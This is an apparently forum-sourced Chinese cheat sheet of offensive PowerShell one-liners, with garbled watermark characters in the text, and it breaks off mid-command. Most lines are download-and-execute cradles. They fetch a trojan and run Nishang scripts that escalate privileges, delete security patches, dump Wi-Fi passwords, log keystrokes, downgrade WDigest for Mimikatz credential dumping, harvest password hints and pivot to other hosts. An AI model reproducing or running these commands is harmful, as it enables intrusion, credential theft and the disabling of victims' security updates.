powershell脚本利用介绍.doc

利用powershell下载一个马： 利用WebClientT00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security3 ~6 A8 s4 Z: N6 e5 t0 Y V% ~下载一个文件： powershell?(new-object System.Net.WebClient).DownloadFile( /360/inst.exe,d:\\test\\360.exe) 默认情况下，powershell不允许直接执行ps1脚本，但是使用如下的语句：可以绕过策略限制，直接执行一个ps1的脚本。5 k4 e7 ^9 l* ?, b- p: b4 ?Enable-DuplicateToken powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Escalation/Enable-DuplicateToken.ps1);?Enable-DuplicateToken Remove-Update 删除补丁 powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Escalation/Remove-Update.ps1);?Remove-Update?All ? ? ? ?//删除全部补丁 powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Escalation/Remove-Update.ps1);?Remove-Update?KB2761226 ? ? ? ?//删除指定补丁 powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Escalation/Remove-Update.ps1);?Remove-Update?Security ? ? ? ?//删除安全更新 UAC科普： UAC(User Account Control，用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术，它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前，提供权限或管理员?密码。通过在这些操作启动前对其进行验证，UAC 可以帮助防止恶意软件和间谍软件在未经许可的情况下在计算机上进行安装或对计算机进行更改。Get-WLAN-Keys: 获取无线连接历史密码： powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Gather/Get-WLAN-Keys.ps1);?Get-WLAN-Keys Keylogger： 键盘记录： （无测试） powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Gather/Keylogger.ps1);?Keylogger Invoke-MimikatzWdigestDowngrade 转储在Windows8.1和Server?2012的纯用户密码（测试失败） powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Gather/Invoke-MimikatzWDigestDowngrade.ps1);?MimikatzWDigestDowngrade Get-PassHints： 获取Windows用户的密码提示从目标。 powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Gather/Get-PassHints.ps1);?Get-PassHints Pivot Create-MultipleSessions 检查在多台计算机证书，并创建PSSession中。： powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Pivot/Create-MultipleSessions.ps1);??Create-Mu